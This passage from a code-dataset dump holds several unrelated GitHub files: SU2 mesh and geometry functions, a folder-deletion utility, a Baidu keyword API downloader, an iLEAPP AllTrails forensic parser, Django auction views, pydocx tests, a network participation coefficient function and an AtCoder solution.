Bunch() of functions with keys of objective function names\n and values of objective function floats.\n \"\"\"\n\n # ----------------------------------------------------\n # Initialize\n # ----------------------------------------------------\n\n # initialize\n state = su2io.State(state)\n if not \"MESH\" in state.FILES:\n state.FILES.MESH = config[\"MESH_FILENAME\"]\n special_cases = su2io.get_specialCases(config)\n\n # console output\n if config.get(\"CONSOLE\", \"VERBOSE\") in [\"QUIET\", \"CONCISE\"]:\n log_geom = \"log_Geometry.out\"\n else:\n log_geom = None\n\n # ----------------------------------------------------\n # Update Mesh (check with Trent)\n # ----------------------------------------------------\n\n # does decomposition and deformation\n # info = update_mesh(config,state)\n\n # ----------------------------------------------------\n # Geometry Solution\n # ----------------------------------------------------\n\n # redundancy check\n geometry_done = func_name in state.FUNCTIONS\n # geometry_done = all([key in state.FUNCTIONS for key in su2io.optnames_geo])\n if not geometry_done:\n\n # files to pull\n files = state.FILES\n pull = []\n link = []\n\n # files: mesh\n name = files[\"MESH\"]\n name = su2io.expand_part(name, config)\n link.extend(name)\n\n # update function name\n ## TODO\n\n # output redirection\n with redirect_folder(\"GEOMETRY\", pull, link) as push:\n with redirect_output(log_geom):\n\n # setup config\n config.GEO_PARAM = func_name\n config.GEO_MODE = \"FUNCTION\"\n\n # # RUN GEOMETRY SOLUTION # #\n info = su2run.geometry(config)\n state.update(info)\n\n # no files to push\n\n #: with output redirection\n\n #: if not redundant\n\n # return output\n funcs = su2util.ordered_bunch()\n for key in su2io.optnames_geo:\n if key in state[\"FUNCTIONS\"]:\n funcs[key] = state[\"FUNCTIONS\"][key]\n return funcs\n\n\n#: def geometry()\n\n\ndef update_mesh(config, state=None):\n \"\"\"SU2.eval.update_mesh(config,state=None)\n\n updates mesh with the following:\n SU2.run.deform()\n\n Assumptions:\n Config is already setup for deformation.\n Mesh may or may not be deformed.\n Updates config and state by reference.\n\n Executes in:\n ./DECOMP and ./DEFORM\n\n Inputs:\n config - an SU2 config\n state - optional, an SU2 state\n\n Outputs:\n nothing\n\n Modifies:\n config and state by reference\n \"\"\"\n\n # ----------------------------------------------------\n # Initialize\n # ----------------------------------------------------\n\n # initialize\n state = su2io.State(state)\n if not \"MESH\" in state.FILES:\n state.FILES.MESH = config[\"MESH_FILENAME\"]\n special_cases = su2io.get_specialCases(config)\n\n # console output\n if config.get(\"CONSOLE\", \"VERBOSE\") in [\"QUIET\", \"CONCISE\"]:\n log_decomp = \"log_Decomp.out\"\n log_deform = \"log_Deform.out\"\n else:\n log_decomp = None\n log_deform = None\n\n # ----------------------------------------------------\n # Deformation\n # ----------------------------------------------------\n\n # redundancy check\n deform_set = config[\"DV_KIND\"] == config[\"DEFINITION_DV\"][\"KIND\"]\n deform_todo = not config[\"DV_VALUE_NEW\"] == config[\"DV_VALUE_OLD\"]\n if deform_set and deform_todo:\n\n # files to pull\n pull = []\n link = config[\"MESH_FILENAME\"]\n link = su2io.expand_part(link, config)\n\n pull.extend(config.get(\"CONFIG_LIST\", []))\n\n # output redirection\n with redirect_folder(\"DEFORM\", pull, link) as push:\n with redirect_output(log_deform):\n\n # # RUN DEFORMATION # #\n info = su2run.deform(config)\n 
state.update(info)\n\n # data to push\n meshname = info.FILES.MESH\n names = su2io.expand_part(meshname, config)\n push.extend(names)\n\n #: with redirect output\n\n elif deform_set and not deform_todo:\n state.VARIABLES.DV_VALUE_NEW = config.DV_VALUE_NEW\n\n #: if not redundant\n\n return\n","repo_name":"su2code/SU2","sub_path":"SU2_PY/SU2/eval/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":30617,"program_lang":"python","lang":"en","doc_type":"code","stars":1156,"dataset":"github-code","pt":"63"} +{"seq_id":"70701254920","text":"\"\"\"\nScript to delete environments created.\nAuthor: Keegan Donley\n\"\"\"\nimport os\nimport urllib\nimport shutil\n\n# The colors used for highlighting text output\nclass colors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n LOG = '\\033[90m'\n ENDC = '\\033[0m'\n\n\ndef main():\n print_welcome()\n folderlocation = 'Documents'\n rootdir = get_root_dir()\n\n # Set the working directory to /Users//Documents\n # Only works currently if the script is run from a folder located below /Users//\n while rootdir != os.getcwd():\n os.chdir(os.pardir)\n rootdir = get_root_dir()\n os.chdir(folderlocation)\n\n repeat_confirm = \"Y\"\n while repeat_confirm.upper() == \"Y\":\n print(os.getcwd())\n # Confirm that the directory entered is valid\n folder_to_delete = get_folder_to_delete(folderlocation)\n confirmation = confirm_delete(folder_to_delete)\n if confirmation:\n print(colors.OKGREEN + \"Deleted folder \" + folder_to_delete + colors.ENDC)\n shutil.rmtree(folder_to_delete)\n repeat_confirm = raw_input(\"Would you like to delete another? (Y/N): \")\n while repeat_confirm.upper() != \"Y\" and repeat_confirm.upper() != \"N\":\n os.system('clear')\n print(\"Please enter either 'Y' or 'N'\")\n repeat_confirm = raw_input(\"Would you like to delete another? (Y/N): \")\n os.system('clear')\n\ndef confirm_delete(folder):\n os.system('clear')\n print(\"Current Directory: \" + os.getcwd() + \"\\n\")\n print(colors.FAIL + \"--------------------------------------------------------\" + colors.ENDC)\n print(colors.FAIL + \"WARNING! You're about to permanently delete \" + folder + \".\" + colors.ENDC)\n print(colors.FAIL + \"--------------------------------------------------------\\n\" + colors.ENDC)\n confirmation = raw_input(\"Are you sure you'd like to do this? (Y/N): \")\n while confirmation.upper() != \"Y\" and confirmation.upper() != \"N\":\n os.system('clear')\n print(\"Current Directory: \" + os.getcwd() + \"\\n\")\n print(colors.FAIL + \"\\n--------------------------------------------------------\" + colors.ENDC)\n print(colors.FAIL + \"WARNING! You're about to permanently delete \" + folder + \".\" + colors.ENDC)\n print(colors.FAIL + \"--------------------------------------------------------\\n\" + colors.ENDC)\n print(\"Please enter either 'Y' or 'N'\")\n confirmation = raw_input(\"Are you sure you'd like to do this? (Y/N): \")\n if confirmation.upper() == \"Y\":\n return True\n elif confirmation.upper() == \"N\":\n return False\n\ndef get_folder_to_delete(folderlocation):\n folder = raw_input(\"Please enter the name of the project you'd like to delete (case-sensitive): \")\n folder_path = os.getcwd() + \"/\" + folder + \"/\"\n while os.path.isdir(folder_path) == False:\n print(colors.FAIL + \"!! Directory doesn't exist! 
!!\" + colors.ENDC)\n folder = raw_input(\"Please enter the name of the project you'd like to delete (case-sensitive): \")\n folder_path = \"/\" + folder + \"/\"\n folder_path = folder_path.split('/')\n return folder_path[-2]\n\n\ndef get_root_dir():\n '''\n This function determines the root directory to change the working directory to.\n returns: string of the root directory, in the format /Users//\n '''\n currentdir = os.getcwd()\n currentdir = currentdir.split('/')\n rootdir = '/' + currentdir[1] + '/' + currentdir[2]\n return rootdir\n\n\ndef print_welcome():\n '''\n Print the welcome screen for the user.\n '''\n os.system('clear')\n print(colors.OKBLUE + \"------------- Web Heirarchy Deleter ------------\")\n print(\"By Keegan Donley\\n\")\n print(\"Please begin by entering the desired name of your\")\n print(\"site you'd like to delete\\n\")\n print(colors.FAIL + \"WARNING: This script deletes files from your system. Use carefully\")\n print(\"at your own risk!\")\n print(colors.OKBLUE + \"--------------------------------------------------\\n\" + colors.ENDC)\n\nmain()\n","repo_name":"keegandonley/Website-Environment-Generator","sub_path":"web-delete.py","file_name":"web-delete.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7856663206","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport requests,json,csv,sys,os,time,codecs\r\n\r\ndef convert_to_builtin_type(obj):\r\n d = {}\r\n d.update(obj.__dict__)\r\n return d\r\n\r\nclass AuthHeader():\r\n\r\n def __init__(self, username=None,password=None,token=None,target=None,accessToken=None): \r\n self.username=username\r\n self.password=password\r\n self.token=token\r\n self.target=target\r\n self.accessToken=accessToken\r\n self.action='API-SDK'\r\n\r\n\r\n def setUsername(self,username):\r\n self.username=username\r\n def setPassword(self,password):\r\n self.password=password\r\n def setToken(self,token):\r\n self.token=token\r\n def setTarget(self,target):\r\n self.target=target\r\n def setAccessToken(self,accessToken):\r\n self.accessToken=accessToken\r\n\r\nclass JsonEnvelop():\r\n header=None\r\n body=None\r\n\r\n def __init__(self,aheader=None,abody=None):\r\n self.header=aheader\r\n self.body=abody\r\n def setHeader(self,header):\r\n self.header=header\r\n def setBody(self,body):\r\n self.body=body\r\n\r\nfailwords = open('未采集关键词.txt','w')\r\n\r\n#记录开始时间,count作用是计数同时作为文件名增量\r\nstarttime = time.strftime('%Y/%m/%d %H:%M:%S')\r\ncount = 0\r\n\r\n#3种请求,header和headers是一样的\r\nheader = AuthHeader(username='',password='',token='')\r\nheaders = {'content-type': 'application/json;charset=utf-8'}\r\n\r\n#三个接口的地址\r\nurl1 = 'https://api.baidu.com/json/sms/v4/KRService/getKRFileIdByWords'\r\nurl2 = 'https://api.baidu.com/json/sms/v4/KRService/getFileStatus'\r\nurl3 = 'https://api.baidu.com/json/sms/v4/KRService/getFilePath'\r\n\r\n\r\n#逐行读取文件,每100个生成一个列表作为请求数据\r\ntext = open('keywords.txt','r',encoding='utf-8').readlines()\r\nwhile text:\r\n lines = text[:100]\r\n text = text[100:]\r\n seedWords = []\r\n for i in lines:\r\n seedWords.append(i.strip())\r\n\r\n\r\n #请求文件ID\r\n request1 = {'seedWords':seedWords,'seedFilter': {'device':0,'competeLow':0,}}\r\n jsonEnv1 = JsonEnvelop(header,request1)\r\n jsonStr1=json.dumps(jsonEnv1, default=convert_to_builtin_type, skipkeys=True)\r\n\r\n while True:\r\n try:\r\n print('请求文件ID')\r\n r1 = requests.post(url1,data=jsonStr1,headers=headers)\r\n except:\r\n time.sleep(30)\r\n 
continue\r\n else:\r\n try:\r\n time.sleep(3)\r\n fileId = r1.json()['body']['data'][0]['fileId']\r\n except:\r\n print('请求文件ID:请求出错,等待30s')\r\n time.sleep(30)\r\n else:\r\n break\r\n\r\n #根据文件ID查询文件生成状态\r\n request2 = {\"fileId\":fileId}\r\n jsonEnv2 = JsonEnvelop(header,request2)\r\n jsonStr2=json.dumps(jsonEnv2, default=convert_to_builtin_type, skipkeys=True)\r\n times = 1\r\n con = 0\r\n\r\n while True:\r\n time.sleep(5)\r\n print('请求文件状态')\r\n r2 = requests.post(url2,data=jsonStr2,headers=headers)\r\n try:\r\n time.sleep(7)\r\n filestatus = r2.json()['body']['data'][0]['isGenerated']\r\n except:\r\n print('获取文件状态:请求失败,30s后重试')\r\n time.sleep(30)\r\n else:\r\n if filestatus == 3:\r\n break\r\n elif filestatus != 3 and times %3 != 0:\r\n print('获取文件状态:文件处理中……')\r\n times = times + 1\r\n elif times %3 == 0:\r\n print('获取文件状态:接口阻塞,等待10min,%s' %time.strftime('%H:%M:%S'))\r\n print('当前文件id %s' %fileId)\r\n for i in lines:\r\n failwords.write(i)\r\n times = times + 1\r\n con = 1\r\n time.sleep(610)\r\n break\r\n\r\n #如果等了10分钟,则之前的fileId已经因为超时下载不到文件了,可以选择跳过之后的获取部分\r\n if con == 1:\r\n continue\r\n\r\n #获取文件路径\r\n request3 = {\"fileId\":fileId}\r\n jsonEnv3 = JsonEnvelop(header,request3)\r\n jsonStr3=json.dumps(jsonEnv3, default=convert_to_builtin_type, skipkeys=True)\r\n\r\n while True:\r\n print('请求文件路径')\r\n r3 = requests.post(url3,data=jsonStr3,headers=headers)\r\n try:\r\n time.sleep(3)\r\n filePath = r3.json()['body']['data'][0]['filePath']\r\n except:\r\n print('请求文件路径:请求失败,30s后重试')\r\n time.sleep(30)\r\n else:\r\n break\r\n\r\n\r\n #设置文件名\r\n count = count + 1\r\n filename = time.strftime('%Y-%m-%d') + '-' + str(count) + '.csv'\r\n\r\n #下载文件\r\n r = requests.get(filePath)\r\n with open('%s' %filename,\"wb\") as file:\r\n file.write(r.content)\r\n print('文件%s下载完成' %filename)\r\n\r\n\r\n#记录结束时间\r\nendtime = time.strftime('%Y/%m/%d %H:%M:%S')\r\nprint('耗时:%s - %s' %(starttime,endtime))\r\n\r\nfailwords.close()\r\n","repo_name":"beautyonly/seo-python-tools","sub_path":"百度API挖词.py","file_name":"百度API挖词.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"63"} +{"seq_id":"28019445074","text":"import sqlite3\nimport textwrap\n\nfrom scripts.artifact_report import ArtifactHtmlReport\nfrom scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows, get_next_unused_name, open_sqlite_db_readonly\n\ndef get_AllTrails(files_found, report_folder, seeker, wrap_text):\n \n for file_found in files_found:\n file_found = str(file_found)\n if not file_found.endswith('AllTrails.sqlite'):\n continue # Skip all other files\n \n db = open_sqlite_db_readonly(file_found)\n cursor = db.cursor()\n cursor.execute('''\n Select \n ZTRAIL.ZNAME,\n ZTRAIL.ZROUTETYPENAME,\n CASE ZACTIVITYSTATS.ZDIFFICULTY\n WHEN 1 THEN 'Easy'\n WHEN 3 THEN 'Moderate'\n WHEN 5 THEN 'Hard'\n END,\n ZTRAIL.ZRATING,\n ZTRAIL.ZREVIEWCOUNT,\n ZTRAIL.ZLENGTH as \"Length (Meters)\",\n ZTRAIL.ZELEVATIONGAIN as \"Elevation Gain (Meters)\",\n ZLOCATION.ZLATITUDE,\n ZLOCATION.ZLONGITUDE,\n ZLOCATION.ZCITY,\n ZLOCATION.ZREGION,\n ZLOCATION.ZREGIONNAME,\n ZLOCATION.ZPOSTALCODE,\n ZLOCATION.ZCOUNTRY,\n ZLOCATION.ZCOUNTRYNAME,\n ZPARKAREA.ZNAME as \"Park Area Name\"\n From ZLOCATION\n Join ZTRAIL On ZLOCATION.Z_PK = ZTRAIL.ZLOCATION\n Join ZPARKAREA On ZTRAIL.Z_PK = ZPARKAREA.ZTRAIL\n Join ZACTIVITYSTATS On ZTRAIL.Z_PK = ZACTIVITYSTATS.ZTRAIL\n ''')\n\n all_rows = cursor.fetchall()\n usageentries = len(all_rows)\n if usageentries > 0:\n report = 
ArtifactHtmlReport('AllTrails - Trail Details')\n report.start_artifact_report(report_folder, 'AllTrails - Trail Details')\n report.add_script()\n data_headers = ('Trail Name','Route Type','Trail Difficulty','Rating','Review Count','Length (Meters)','Elevation Gain (Meters)','Latitude','Longitude','City','State/Region','State/Region Name','Zip Code','Country','Country Name','Parking Area Name') # Don't remove the comma, that is required to make this a tuple as there is only 1 element\n data_list = []\n for row in all_rows:\n data_list.append((row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11],row[12],row[13],row[14],row[15],))\n\n report.write_artifact_data_table(data_headers, data_list, file_found)\n report.end_artifact_report()\n \n tsvname = f'AllTrails - Trail Details'\n tsv(report_folder, data_headers, data_list, tsvname)\n \n else:\n logfunc('No AllTrails - Trail Details data available')\n \n cursor.execute('''\n Select \n datetime(ZUSER.ZCREATIONTIME + 978307200,'unixepoch') as \"Creation Timestamp\",\n ZUSER.ZFIRSTNAME,\n ZUSER.ZLASTNAME,\n ZUSER.ZUSERNAME,\n ZPROFILE.ZEMAIL,\n ZUSER.ZREFERRALLINK,\n ZLOCATION.ZLATITUDE,\n ZLOCATION.ZLONGITUDE,\n ZLOCATION.ZCITY,\n ZLOCATION.ZREGION,\n ZLOCATION.ZREGIONNAME,\n ZLOCATION.ZCOUNTRY,\n ZLOCATION.ZCOUNTRYNAME,\n ZLOCATION.ZPOSTALCODE\n From ZUSER\n Inner Join ZPROFILE On ZUSER.Z_PK = ZPROFILE.ZUSER\n Inner Join ZLOCATION On ZUSER.ZLOCATION = ZLOCATION.Z_PK\n ''')\n\n all_rows = cursor.fetchall()\n usageentries = len(all_rows)\n if usageentries > 0:\n report = ArtifactHtmlReport('AllTrails - User Info')\n report.start_artifact_report(report_folder, 'AllTrails - User Info')\n report.add_script()\n data_headers = ('Creation Timestamp','First Name','Last Name','User Name','Email','Referral Link','Latitude','Longitude','City','Region','Region Name','Country','Country Name','Zip Code') # Don't remove the comma, that is required to make this a tuple as there is only 1 element\n data_list = []\n for row in all_rows:\n data_list.append((row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11],row[12],row[13]))\n\n report.write_artifact_data_table(data_headers, data_list, file_found)\n report.end_artifact_report()\n \n tsvname = f'AllTrails - User Info'\n tsv(report_folder, data_headers, data_list, tsvname)\n \n tlactivity = f'AllTrails - User Info'\n timeline(report_folder, tlactivity, data_list, data_headers)\n else:\n logfunc('No AllTrails - User Info data available')\n\n db.close()\n return\n\n__artifacts__ = {\n \"alltrails\": (\n \"AllTrails\",\n ('**/Documents/AllTrails.sqlite*'),\n get_AllTrails)\n}\n","repo_name":"abrignoni/iLEAPP","sub_path":"scripts/artifacts/AllTrails.py","file_name":"AllTrails.py","file_ext":"py","file_size_in_byte":4692,"program_lang":"python","lang":"en","doc_type":"code","stars":559,"dataset":"github-code","pt":"63"} +{"seq_id":"7748837165","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.decorators import login_required\nimport pdb\nfrom .models import User, Listing, Bid, Comment, Category\n\ndef index(request):\n listings = Listing.objects.filter(listing_is_active = True)\n return render(request, \"auctions/index.html\",{\n \"listings\": listings\n })\n\n\ndef 
login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\n@login_required\ndef create_listing(request):\n if request.method == \"POST\":\n try:\n newListing = Listing.objects.create(\n listing_title = request.POST[\"title\"],\n listing_image = request.FILES[\"image\"],\n listing_description = request.POST[\"description\"],\n listing_starting_bid = request.POST[\"bid\"],\n listing_current_price = request.POST[\"bid\"],\n listing_user = request.user,\n listing_is_active = True,\n listing_category = Category.objects.get(category_name=request.POST[\"category\"])\n )\n return HttpResponseRedirect(reverse(\"listing\", args=(newListing.id, \"Listing created successfuly!\")))\n except:\n return render(request,\"create-listing\",{\n \"error\":\"Please fill out all the fields before submitting.\"\n })\n else:\n categories = Category.objects.all()\n return render(request, \"auctions/create-listing.html\",{\n \"categories\": categories\n })\n\ndef listing(request, listing_id, message=\"\"):\n listing = Listing.objects.get(pk=listing_id)\n listing_in_watchlist = request.user in listing.listing_watchlist.all()\n comments = Comment.objects.filter(comment_listing = listing)\n return render(request, \"auctions/listing.html\",{\n \"listing\": listing,\n \"listing_in_watchlist\": listing_in_watchlist,\n \"message\": message, \n \"comments\": comments\n })\n\n@login_required\ndef watchlist(request):\n currentUser = request.user\n listings = currentUser.listingWatchlist.all()\n return render(request, \"auctions/watchlist.html\",{\n \"listings\": listings\n })\n\ndef categories(request):\n categories = Category.objects.all()\n return render(request, \"auctions/categories.html\", {\n \"categories\": categories\n })\n\ndef category(request, category_name):\n category = Category.objects.get(category_name=category_name)\n \n try:\n listings = Listing.objects.filter(listing_category = category, listing_is_active=True)\n except:\n listings = [] \n return render(request, \"auctions/category.html\",{\n \"listings\": listings\n })\n\n@login_required\ndef update_watchlist(request):\n if request.method == \"POST\":\n listing = 
Listing.objects.get(pk=int(request.POST[\"listing_id\"]))\n current_user = request.user\n if request.POST[\"action\"] == \"remove\":\n listing.listing_watchlist.remove(current_user)\n elif request.POST[\"action\"] == \"add\":\n listing.listing_watchlist.add(current_user) \n return HttpResponseRedirect(reverse(\"listing\", args=(listing.id, \"Watchlist updated successfuly!\")))\n\n@login_required\ndef place_bid(request):\n if request.method == \"POST\":\n listing = Listing.objects.get(pk=request.POST[\"listing_id\"])\n if float(request.POST[\"bid\"]) > listing.listing_current_price:\n bid = Bid.objects.create(\n bid_listing = listing,\n bid_amount = float(request.POST[\"bid\"]),\n bid_user = request.user\n )\n listing.listing_current_price = bid.bid_amount\n listing.listing_winner = request.user\n listing.save()\n return HttpResponseRedirect(reverse(\"listing\", args=(listing.id, \"Your bid was submitted successfully!\")))\n else:\n return HttpResponseRedirect(reverse(\"listing\", args=(listing.id, \"Your bid must be higher than the current bid.\")))\n return HttpResponseRedirect(reverse('login'))\n\n@login_required\ndef submit_comment(request):\n if request.method == \"POST\":\n listing = Listing.objects.get(pk=int(request.POST[\"listing_id\"]))\n comment = Comment.objects.create(\n comment_user = request.user,\n comment_listing = listing,\n comment_text = request.POST[\"comment\"]\n )\n return HttpResponseRedirect(reverse(\"listing\", args=(listing.id, \"Your comment was submitted\")))\n return HttpResponseRedirect(reverse('login'))\n\n@login_required\ndef close_auction(request):\n if request.method == \"POST\":\n listing = Listing.objects.get(pk=int(request.POST[\"listing_id\"]))\n listing.listing_is_active = False\n listing.save()\n return HttpResponseRedirect(reverse('listing', args=(listing.id, \"Auction closed successfuly!\")))\n return HttpResponseRedirect(reverse('login'))","repo_name":"VenireVidereVincere/auctions-web-app","sub_path":"auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"539413982","text":"# coding: utf-8\nfrom __future__ import (\n absolute_import,\n print_function,\n unicode_literals,\n)\n\nfrom unittest import TestCase\n\nfrom pydocx.openxml.wordprocessing import RunProperties\nfrom pydocx.util.xml import parse_xml_from_string\n\n\nclass RunPropertiesTestCase(TestCase):\n def _load_styles_from_xml(self, xml):\n root = parse_xml_from_string(xml)\n return RunProperties.load(root)\n\n def test_run_properties_with_symbol_font(self):\n xml = b'''\n \n \n \n '''\n properties = self._load_styles_from_xml(xml)\n\n self.assertTrue(properties.r_fonts.is_symbol())\n\n def test_bold_on(self):\n xml = b'''\n \n \n \n '''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.bold.value, 'on')\n assert bool(properties.bold)\n\n def test_bold_off(self):\n xml = b'''\n \n \n \n '''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.bold.value, 'off')\n assert not bool(properties.bold)\n\n def test_items(self):\n xml = b'''\n \n \n \n \n '''\n properties = self._load_styles_from_xml(xml)\n result = dict(properties.fields)\n self.assertEqual(\n sorted(result.keys()),\n sorted(['bold', 'italic']),\n )\n assert not bool(result['bold'])\n assert bool(result['italic'])\n\n def test_size_property_returns_None_when_sz_is_None(self):\n xml = ''\n properties = self._load_styles_from_xml(xml)\n 
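# Editor's note (hedged): the inline XML literals in this module appear to
# have been stripped during text extraction -- each `xml = ''` or empty
# b'''...''' block presumably held a <rPr> run-properties element. A sketch
# of what the nearby size tests plausibly looked like, following the
# namespace-stripped style these tests imply; the exact tag and attribute
# names here are assumptions, not recovered from the original file:
#
#     xml = b'<rPr><sz val="24"/></rPr>'
#     properties = self._load_styles_from_xml(xml)
#     self.assertEqual(properties.size, 24)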
self.assertEqual(properties.size, None)\n\n def test_size_property_returns_int_of_sz(self):\n xml = ''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.size, int(properties.sz))\n\n def test_position_property_returns_0_when_pos_is_None(self):\n xml = ''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.position, 0)\n\n def test_position_property_returns_int_of_position(self):\n xml = ''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.position, int(properties.pos))\n\n def test_size_property_can_be_a_decimal(self):\n xml = ''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.size, 10.1234)\n\n def test_size_property_has_garbage_returns_0(self):\n xml = ''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.size, None)\n","repo_name":"CenterForOpenScience/pydocx","sub_path":"tests/openxml/wordprocessing/test_run_properties.py","file_name":"test_run_properties.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":176,"dataset":"github-code","pt":"63"} +{"seq_id":"10620226557","text":"import numpy as np\nfrom ..utils import process_input\n\ndef temporal_part_coef(tnet, communities=None, removeneg=False):\n r'''\n Temporal participation coefficient is a measure of diversity of connections across communities for individual nodes.\n\n Parameters\n ----------\n tnet : array, dict\n graphlet or contact sequence input. Only positive matrices considered.\n communities : array\n community vector. Either 1D (node) community index or 2D (node,time).\n removeneg : bool (default false)\n If true, all values < 0 are made to be 0. \n\n\n Returns\n -------\n P : array\n participation coefficient\n\n\n Notes\n -----\n\n Static participatoin coefficient is:\n\n .. math:: P_i = 1 - \\sum_s^{N_M}({{k_{is}}\\over{k_i}})^2 \n\n Where s is the index of each community (:math:`N_M`). :math:`k_i` is total degree of node. And :math:`k_{is}` is degree of connections within community.[part-1]_\n\n This \"temporal\" version only loops through temporal snapshots and calculates :math:`P_i` for each t.\n\n If directed, function sums axis=1, so tnet may need to be transposed before hand depending on what type of directed part_coef you are interested in.\n\n\n References\n ----------\n\n .. [part-1] Guimera et al (2005) Functional cartography of complex metabolic networks. Nature. 433: 7028, p895-900. 
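    A quick worked example (editor's addition; the numbers are illustrative):
    a node with total degree :math:`k_i = 4` at time t, having 2 edges in
    community A and 2 in community B, has
    :math:`P = 1 - ((2/4)^2 + (2/4)^2) = 0.5`; if all 4 edges sit in a single
    community, :math:`P = 1 - (4/4)^2 = 0`.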
[`Link `_]\n '''\n\n if communities is None:\n if isinstance(tnet,dict):\n if 'communities' in tnet.keys():\n communities = tnet['communities']\n else:\n raise ValueError('Community index not found')\n else:\n raise ValueError('Community must be provided for graphlet input')\n\n # Get input in right format\n tnet, netinfo = process_input(tnet, ['C', 'G', 'TN'])\n\n if np.sum(tnet<0) > 0 and not removeneg:\n raise ValueError('Negative connections found')\n if removeneg:\n tnet[tnet<0] = 0\n\n k_is = np.zeros([netinfo['netshape'][0],netinfo['netshape'][2]])\n part = np.ones([netinfo['netshape'][0],netinfo['netshape'][2]])\n\n for t in np.arange(0,netinfo['netshape'][2]):\n if len(communities.shape)==2:\n C = communities[:,t]\n else:\n C = communities\n for i in np.unique(C):\n k_is[:,t] += np.square(np.sum(tnet[:,C == i,t], axis=1))\n\n part = part - (k_is / np.square(np.sum(tnet, axis=1)))\n # Set any division by 0 to 0\n part[np.isnan(part)==1] = 0\n\n return part\n","repo_name":"rciric/teneto","sub_path":"teneto/networkmeasures/temporal_part_coef.py","file_name":"temporal_part_coef.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"42121307550","text":"from fractions import gcd\nfrom collections import Counter, deque, defaultdict\nfrom heapq import heappush, heappop, heappushpop, heapify, heapreplace, merge\nfrom bisect import bisect_left, bisect_right, bisect, insort_left, insort_right, insort\nfrom itertools import accumulate, product, permutations, combinations\n\ndef main():\n N, M, K = map(int, input().split())\n A = list(map(int, input().split()))\n B = list(map(int, input().split()))\n\n cumsumA = [0] + list(accumulate(A))\n cumsumB = [0] + list(accumulate(B))\n\n res = 0\n\n for i in range(N+1):\n if i == 0:\n for j in range(M, -1, -1):\n if cumsumB[j] <= K:\n max_j = j\n res = max(res, i + j)\n break\n else:\n for j in range(max_j, -1, -1):\n time = cumsumA[i] + cumsumB[j]\n if time <= K:\n max_j = j\n res = max(res, i + j)\n break\n \n print(res)\n\nif __name__ == '__main__':\n main()","repo_name":"chokoryu/atcoder","sub_path":"problems/abc172_c.py","file_name":"abc172_c.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"15431396464","text":"\"\"\"\nСайт для виконання завдання: https://jsonplaceholder.typicode.com\n\nНаписати програму, яка буде робити наступне:\n1. Робить запрос на https://jsonplaceholder.typicode.com/users і вертає коротку інформацію про користувачів (ID, ім'я, нікнейм)\n2. Запропонувати обрати користувача (ввести ID)\n3. Розробити наступну менюшку (із вкладеними пунктами):\n 1. Повна інформація про користувача\n 2. Пости:\n - перелік постів користувача (ID та заголовок)\n - інформація про конкретний пост (ID, заголовок, текст, кількість коментарів + перелік їхніх ID)\n 3. ТУДУшка:\n - список невиконаних задач\n - список виконаних задач\n 4. 
